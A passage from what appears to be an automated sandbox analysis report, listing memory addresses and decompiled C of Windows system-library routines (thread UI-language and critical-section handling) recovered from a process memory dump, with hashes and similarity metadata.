                                      0x00000000
                                      0x05372829
                                      0x05372829
                                      0x05372831
                                      0x0537283c
                                      0x0537283e
                                      0x00000000
                                      0x0537283e
                                      0x00000000
                                      0x00000000
                                      0x0537284e
                                      0x05372850
                                      0x05372851
                                      0x05372854
                                      0x05372857
                                      0x0537285a
                                      0x0537285c
                                      0x0537285d
                                      0x00000000
                                      0x00000000
                                      0x0537275d
                                      0x05372761
                                      0x00000000
                                      0x05372767
                                      0x0537276e
                                      0x05372773
                                      0x05372773
                                      0x05372776
                                      0x05372778
                                      0x0537277e
                                      0x0537277e
                                      0x05372781
                                      0x05372781
                                      0x05372783
                                      0x05372784
                                      0x00000000
                                      0x00000000
                                      0x053b5bd8
                                      0x053b5bde
                                      0x053b5be4
                                      0x053b5be6
                                      0x053b5be8
                                      0x053b5be9
                                      0x053b5bee
                                      0x053b5bf8
                                      0x053b5bff
                                      0x053b5c01
                                      0x053b5c04
                                      0x053b5c07
                                      0x053b5c0b
                                      0x053b5c0d
                                      0x053b5c0d
                                      0x053b5c15
                                      0x053b5c18
                                      0x053b5c1b
                                      0x053b5c1b
                                      0x053b5c1e
                                      0x00000000
                                      0x00000000
                                      0x053728c3
                                      0x053728c8
                                      0x053728d2
                                      0x053728d4
                                      0x053728d8
                                      0x053728db
                                      0x053b5c26
                                      0x053b5c28
                                      0x053b5c2d
                                      0x053b5c2d
                                      0x00000000
                                      0x00000000
                                      0x053b5c34
                                      0x053b5c36
                                      0x053b5c49
                                      0x053b5c4e
                                      0x053b5c54
                                      0x053b5c5b
                                      0x053b5c5d
                                      0x053b5c60
                                      0x05372788
                                      0x05372788
                                      0x0537278b
                                      0x0537278e
                                      0x0537278e
                                      0x0537278e
                                      0x05372791
                                      0x00000000
                                      0x00000000
                                      0x05372756
                                      0x05372750
                                      0x00000000
                                      0x05372794
                                      0x05372794
                                      0x05372795
                                      0x05372798
                                      0x05372798
                                      0x00000000
                                      0x05372734
                                      0x0537272c
                                      0x05372700
                                      0x053725ef
                                      0x053725ef
                                      0x053725ef
                                      0x053725f2
                                      0x053725f8
                                      0x00000000
                                      0x00000000
                                      0x053725fe
                                      0x00000000
                                      0x053728e6
                                      0x053728ec
                                      0x053728ef
                                      0x053728f5
                                      0x053728f8
                                      0x053728f8
                                      0x00000000
                                      0x053728f8
                                      0x00000000
                                      0x00000000
                                      0x05372866
                                      0x05372866
                                      0x05372876
                                      0x05372879
                                      0x00000000
                                      0x00000000
                                      0x053727e0
                                      0x053727e7
                                      0x053727e9
                                      0x053727eb
                                      0x053b5afd
                                      0x00000000
                                      0x053b5afd
                                      0x00000000
                                      0x00000000
                                      0x05372633
                                      0x05372638
                                      0x0537263b
                                      0x0537263c
                                      0x0537263e
                                      0x05372640
                                      0x05372642
                                      0x05372647
                                      0x05372649
                                      0x0537264e
                                      0x05372650
                                      0x05372653
                                      0x05372659
                                      0x053726a2
                                      0x053726a7
                                      0x053726ac
                                      0x053726b2
                                      0x053b5b11
                                      0x053b5b15
                                      0x053b5b17
                                      0x00000000
                                      0x053726b8
                                      0x053726b8
                                      0x053726ba
                                      0x053727a6
                                      0x053727a6
                                      0x053727a9
                                      0x053727ab
                                      0x053727b9
                                      0x053727b9
                                      0x053727be
                                      0x053727c1
                                      0x053727c3
                                      0x053727c5
                                      0x053727c7
                                      0x053b5c74
                                      0x053b5c79
                                      0x053b5c79
                                      0x053727c7
                                      0x00000000
                                      0x053726c0
                                      0x053726c0
                                      0x053726c3
                                      0x053726c6
                                      0x053726c6
                                      0x053726c9
                                      0x053726c9
                                      0x00000000
                                      0x053726c9
                                      0x053726ba
                                      0x0537265b
                                      0x0537265b
                                      0x0537265e
                                      0x05372667
                                      0x0537266d
                                      0x05372677
                                      0x0537267c
                                      0x0537267f
                                      0x05372681
                                      0x053b5b49
                                      0x053b5b4e
                                      0x053727cd
                                      0x053727d0
                                      0x053727d1
                                      0x053727d2
                                      0x053727d4
                                      0x053727dd
                                      0x05372687
                                      0x05372687
                                      0x0537268a
                                      0x0537268b
                                      0x0537268e
                                      0x0537268f
                                      0x05372691
                                      0x05372696
                                      0x05372698
                                      0x0537269d
                                      0x0537269f
                                      0x00000000
                                      0x0537269f
                                      0x05372681
                                      0x00000000
                                      0x00000000
                                      0x05372846
                                      0x00000000
                                      0x00000000
                                      0x05372605
                                      0x0537260a
                                      0x0537260c
                                      0x05372611
                                      0x05372616
                                      0x05372619
                                      0x05372619
                                      0x0537261e
                                      0x00000000
                                      0x05372624
                                      0x05372627
                                      0x05372627
                                      0x00000000
                                      0x00000000
                                      0x053b5b1f
                                      0x00000000
                                      0x00000000
                                      0x05372894
                                      0x0537289b
                                      0x0537289d
                                      0x053728a1
                                      0x053b5b2b
                                      0x053b5b2e
                                      0x053b5b2e
                                      0x053728a7
                                      0x053728a9
                                      0x053b5b04
                                      0x053b5b09
                                      0x053b5b09
                                      0x053b5b09
                                      0x00000000
                                      0x00000000
                                      0x053b5b35
                                      0x053b5b3c
                                      0x053728fb
                                      0x053728fb
                                      0x053726cc
                                      0x053726cc
                                      0x053726d0
                                      0x00000000
                                      0x053726d2
                                      0x053726d2
                                      0x00000000
                                      0x053726d2
                                      0x00000000
                                      0x00000000
                                      0x053725fe
                                      0x0537292d
                                      0x05372930
                                      0x05372935
                                      0x05372937
                                      0x0537293d
                                      0x0537293f
                                      0x05372945
                                      0x05372946
                                      0x05372948
                                      0x0537294d
                                      0x0537294e
                                      0x0537294f
                                      0x0537295a
                                      0x0537295c
                                      0x05372963
                                      0x05372969
                                      0x0537296a
                                      0x05372971
                                      0x0537297b
                                      0x05372981
                                      0x05372982
                                      0x05372983
                                      0x05372984
                                      0x05372985
                                      0x05372986
                                      0x05372987
                                      0x05372988
                                      0x05372989
                                      0x0537298a
                                      0x0537298b
                                      0x0537298c
                                      0x0537298d
                                      0x0537298e
                                      0x0537298f
                                      0x05372990
                                      0x05372992
                                      0x05372997
                                      0x053729a3
                                      0x053729a6
                                      0x053729ab
                                      0x053729ad
                                      0x053729b0
                                      0x053729b2
                                      0x053b5c80
                                      0x053729b8
                                      0x053729b8
                                      0x053729bb
                                      0x053729c0
                                      0x053729c5
                                      0x053729c6
                                      0x053729c6
                                      0x053729c9
                                      0x053729cb
                                      0x00000000
                                      0x00000000
                                      0x053729cd
                                      0x053729d0
                                      0x053729d9
                                      0x053729db
                                      0x053729dd
                                      0x05372a7f
                                      0x05372a84
                                      0x05372a87
                                      0x05372a89
                                      0x053b5ca1
                                      0x053b5ca3
                                      0x00000000
                                      0x05372a8f
                                      0x05372a8f
                                      0x00000000
                                      0x05372a8f
                                      0x00000000
                                      0x053729e3
                                      0x053729e3
                                      0x053729e3
                                      0x00000000
                                      0x053729e3
                                      0x053729dd
                                      0x00000000
                                      0x053729db
                                      0x053729e6
                                      0x053729e9
                                      0x053729eb
                                      0x053729ed
                                      0x053729f3
                                      0x053729f5
                                      0x053729f8
                                      0x053729fa
                                      0x05372a97
                                      0x05372a9a
                                      0x05372a9d
                                      0x05372add
                                      0x00000000
                                      0x05372a9f
                                      0x05372aa2
                                      0x05372aa5
                                      0x05372aa8
                                      0x05372aab
                                      0x053b5cab
                                      0x053b5caf
                                      0x053b5cc5
                                      0x053b5cda
                                      0x053b5cdc
                                      0x053b5cdf
                                      0x053b5ce5
                                      0x00000000
                                      0x053b5ceb
                                      0x053b5ced
                                      0x053b5cee
                                      0x00000000
                                      0x053b5cee
                                      0x053b5cb1
                                      0x053b5cb4
                                      0x053b5cb9
                                      0x053b5cbb
                                      0x00000000
                                      0x053b5cbd
                                      0x053b5cbd
                                      0x00000000
                                      0x053b5cbd
                                      0x053b5cbb
                                      0x05372ab1
                                      0x05372ab1
                                      0x05372ac4
                                      0x05372ac6
                                      0x05372ac6
                                      0x00000000
                                      0x05372ac6
                                      0x05372aab
                                      0x00000000
                                      0x05372a00
                                      0x05372a09
                                      0x05372a0e
                                      0x05372a21
                                      0x05372a24
                                      0x05372a35
                                      0x05372a3a
                                      0x05372a3d
                                      0x05372a42
                                      0x05372a59
                                      0x05372a59
                                      0x05372a5c
                                      0x05372a5f
                                      0x05372a5f
                                      0x053729fa
                                      0x053729f3
                                      0x05372a64
                                      0x05372a64
                                      0x05372a6b
                                      0x05372a6b
                                      0x05372a6d
                                      0x05372a72
                                      0x05372a72
                                      0x00000000

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: PATH
                                      • API String ID: 0-1036084923
                                      • Opcode ID: 9ca8f4deff57b691f00e7a1568f8e40b41335b5a5417b4181715de552bfc33a3
                                      • Instruction ID: 44bf226e8aa4c811cead440bf81137cf369e76dd66e87e11e498b10bb9638fd5
                                      • Opcode Fuzzy Hash: 9ca8f4deff57b691f00e7a1568f8e40b41335b5a5417b4181715de552bfc33a3
                                      • Instruction Fuzzy Hash: 6EC1AEB5E142199BCB25DF98D981BFEB7B5FF48700F484029F801EB650E7B8A941CB64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0537FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 80%
                                      			E0537FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0535EEF0(0x5437b60);
					_t134 =  *0x5437b84; // 0x771c7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x5437b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x5437b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E05356D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E053576E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E053E8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0534B150();
													}
													_t116 = E053E6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E053575CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x5438638; // 0x35a1b30
																	_t122 = L053538A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E053576E2(_t154);
																			goto L41;
																		}
																	} else {
																		E053576E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0537FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L053570F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0537FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0537FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0537FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0537FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0537FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x5437b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x5437b84 = _t75;
						_t73 = E0535EB70(_t134, 0x5437b60);
						if( *0x5437b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0535FF60( *0x5437b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                      0x0537fab0
                                      0x0537fab2
                                      0x0537fab3
                                      0x0537fab4
                                      0x0537fabc
                                      0x0537fac0
                                      0x0537fb14
                                      0x0537fb17
                                      0x0537fac2
                                      0x0537fac8
                                      0x0537facd
                                      0x0537fad3
                                      0x0537fad3
                                      0x0537fadd
                                      0x0537fb18
                                      0x0537fb1b
                                      0x0537fb1d
                                      0x0537fb1e
                                      0x0537fb1f
                                      0x0537fb20
                                      0x0537fb21
                                      0x0537fb22
                                      0x0537fb23
                                      0x0537fb24
                                      0x0537fb25
                                      0x0537fb26
                                      0x0537fb27
                                      0x0537fb28
                                      0x0537fb29
                                      0x0537fb2a
                                      0x0537fb2b
                                      0x0537fb2c
                                      0x0537fb2d
                                      0x0537fb2e
                                      0x0537fb2f
                                      0x0537fb3a
                                      0x0537fb3b
                                      0x0537fb3e
                                      0x0537fb41
                                      0x0537fb44
                                      0x0537fb47
                                      0x0537fb4a
                                      0x0537fb4d
                                      0x0537fb53
                                      0x053bbdcb
                                      0x053bbdcb
                                      0x0537fb59
                                      0x0537fb5b
                                      0x0537fb5b
                                      0x0537fb5e
                                      0x053bbdd5
                                      0x053bbdd8
                                      0x00000000
                                      0x053bbdda
                                      0x00000000
                                      0x053bbdda
                                      0x0537fb64
                                      0x0537fb64
                                      0x0537fb64
                                      0x0537fb67
                                      0x0537fb6e
                                      0x0537fb70
                                      0x0537fb72
                                      0x00000000
                                      0x0537fb78
                                      0x0537fb7a
                                      0x0537fb7a
                                      0x0537fb7d
                                      0x0537fb80
                                      0x053bbddf
                                      0x053bbde1
                                      0x00000000
                                      0x053bbde3
                                      0x00000000
                                      0x053bbde3
                                      0x0537fb86
                                      0x0537fb86
                                      0x0537fb86
                                      0x0537fb8b
                                      0x0537fb90
                                      0x0537fb92
                                      0x0537fb94
                                      0x0537fb9a
                                      0x0537fb9b
                                      0x0537fba1
                                      0x053bbde8
                                      0x053bbdeb
                                      0x053bbded
                                      0x053bbeb5
                                      0x053bbeb5
                                      0x053bbebb
                                      0x053bbebd
                                      0x053bbec3
                                      0x053bbed2
                                      0x053bbedd
                                      0x053bbedd
                                      0x053bbeed
                                      0x00000000
                                      0x053bbdf3
                                      0x053bbdfe
                                      0x053bbe06
                                      0x053bbe0b
                                      0x053bbe0d
                                      0x053bbe0f
                                      0x053bbe14
                                      0x053bbe19
                                      0x053bbe20
                                      0x053bbe25
                                      0x053bbe27
                                      0x053bbe35
                                      0x053bbe39
                                      0x053bbe46
                                      0x053bbe4f
                                      0x053bbe54
                                      0x053bbe56
                                      0x053bbef8
                                      0x053bbef8
                                      0x00000000
                                      0x053bbe5c
                                      0x053bbe5c
                                      0x053bbe60
                                      0x00000000
                                      0x053bbe66
                                      0x053bbe66
                                      0x053bbe7f
                                      0x053bbe84
                                      0x053bbe87
                                      0x053bbe89
                                      0x053bbe8b
                                      0x053bbe99
                                      0x053bbe9d
                                      0x053bbea0
                                      0x053bbeac
                                      0x053bbeaf
                                      0x053bbeb1
                                      0x053bbeb3
                                      0x053bbeb3
                                      0x00000000
                                      0x053bbea2
                                      0x053bbea2
                                      0x00000000
                                      0x053bbea2
                                      0x053bbe8d
                                      0x053bbe8d
                                      0x053bbe92
                                      0x00000000
                                      0x053bbe92
                                      0x053bbe8b
                                      0x053bbe60
                                      0x053bbe3b
                                      0x053bbe3b
                                      0x053bbe3e
                                      0x00000000
                                      0x053bbe40
                                      0x053bbe40
                                      0x053bbe44
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x053bbe44
                                      0x053bbe3e
                                      0x053bbe29
                                      0x053bbe29
                                      0x00000000
                                      0x053bbe29
                                      0x053bbe27
                                      0x00000000
                                      0x0537fba7
                                      0x0537fba7
                                      0x0537fbab
                                      0x053bbf02
                                      0x0537fbb1
                                      0x0537fbb1
                                      0x0537fbb8
                                      0x0537fbbd
                                      0x0537fbbd
                                      0x0537fbbf
                                      0x0537fbbf
                                      0x0537fbc5
                                      0x0537fbcb
                                      0x0537fbf8
                                      0x0537fbf8
                                      0x0537fbfa
                                      0x00000000
                                      0x0537fc00
                                      0x0537fc00
                                      0x0537fc03
                                      0x00000000
                                      0x0537fc09
                                      0x0537fc09
                                      0x0537fc0f
                                      0x0537fc15
                                      0x0537fc23
                                      0x0537fc23
                                      0x0537fc25
                                      0x0537fc27
                                      0x0537fc75
                                      0x0537fc7c
                                      0x0537fc84
                                      0x00000000
                                      0x0537fc29
                                      0x0537fc29
                                      0x0537fc2d
                                      0x0537fc30
                                      0x053bbf0f
                                      0x00000000
                                      0x0537fc36
                                      0x0537fc38
                                      0x0537fc3b
                                      0x0537fc41
                                      0x053bbf17
                                      0x053bbf19
                                      0x053bbf48
                                      0x053bbf4b
                                      0x00000000
                                      0x053bbf1b
                                      0x053bbf22
                                      0x053bbf24
                                      0x053bbf26
                                      0x00000000
                                      0x053bbf2c
                                      0x053bbf37
                                      0x053bbf39
                                      0x053bbf3b
                                      0x00000000
                                      0x053bbf41
                                      0x053bbf41
                                      0x053bbf41
                                      0x053bbf41
                                      0x053bbf45
                                      0x00000000
                                      0x053bbf45
                                      0x053bbf3b
                                      0x053bbf26
                                      0x00000000
                                      0x0537fc47
                                      0x0537fc47
                                      0x0537fc49
                                      0x0537fcb2
                                      0x0537fcb4
                                      0x0537fcb6
                                      0x0537fcdc
                                      0x0537fcdc
                                      0x00000000
                                      0x0537fcb8
                                      0x0537fcc3
                                      0x0537fcc5
                                      0x0537fcc7
                                      0x00000000
                                      0x0537fcc9
                                      0x0537fcc9
                                      0x0537fccd
                                      0x00000000
                                      0x0537fccd
                                      0x0537fcc7
                                      0x00000000
                                      0x0537fc4b
                                      0x0537fc4b
                                      0x0537fc4e
                                      0x0537fc4e
                                      0x0537fc51
                                      0x0537fc51
                                      0x0537fc54
                                      0x0537fc5a
                                      0x0537fc5c
                                      0x0537fc5f
                                      0x0537fc61
                                      0x0537fc63
                                      0x0537fc65
                                      0x0537fc67
                                      0x0537fc6e
                                      0x0537fc72
                                      0x0537fc72
                                      0x0537fc72
                                      0x0537fc72
                                      0x0537fc67
                                      0x0537fc61
                                      0x00000000
                                      0x0537fc5a
                                      0x0537fc49
                                      0x0537fc41
                                      0x0537fc30
                                      0x0537fc27
                                      0x0537fc03
                                      0x0537fbcd
                                      0x0537fbd3
                                      0x0537fbd9
                                      0x0537fbdc
                                      0x0537fbde
                                      0x0537fc99
                                      0x0537fc9b
                                      0x0537fc9d
                                      0x0537fcd5
                                      0x0537fcd5
                                      0x0537fc89
                                      0x0537fc89
                                      0x00000000
                                      0x0537fc9f
                                      0x0537fc9f
                                      0x0537fca3
                                      0x00000000
                                      0x0537fca3
                                      0x00000000
                                      0x0537fbe4
                                      0x0537fbe4
                                      0x0537fbe4
                                      0x0537fbe4
                                      0x0537fbe9
                                      0x0537fbf2
                                      0x00000000
                                      0x0537fbf2
                                      0x0537fbde
                                      0x0537fbcb
                                      0x0537fbab
                                      0x0537fc8b
                                      0x0537fc8b
                                      0x0537fc8c
                                      0x0537fb80
                                      0x0537fb72
                                      0x0537fb5e
                                      0x0537fc8d
                                      0x0537fc91
                                      0x0537fadf
                                      0x0537fadf
                                      0x0537fae1
                                      0x0537fae4
                                      0x0537fae7
                                      0x0537faec
                                      0x0537faf8
                                      0x0537fb00
                                      0x0537fb07
                                      0x0537fb0f
                                      0x0537fb0f
                                      0x0537fb07
                                      0x00000000
                                      0x0537faf8
                                      0x0537fadd

                                      Strings
                                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 053BBE0F
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                      • API String ID: 0-865735534
                                      • Opcode ID: 2190cdf6e543377a312e0905b29e8efc3e86c9759b138425bd0b0e1ea53ea001
                                      • Instruction ID: 8fbff70940f0c80a3ba846336cab70c70feabaed4d26049ceda8b43d9557840d
                                      • Opcode Fuzzy Hash: 2190cdf6e543377a312e0905b29e8efc3e86c9759b138425bd0b0e1ea53ea001
                                      • Instruction Fuzzy Hash: 4EA11471F1460A8BEB35DF68C454BBAB3A5BF44720F04456DEA42DBA90DBB8D901CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05342D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 63%
                                      			E05342D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x5435350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x5437bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E053897C0();
				}
				if( *0x54379c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x54379c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E05371624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E05367D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E053DFE87(_t93);
						}
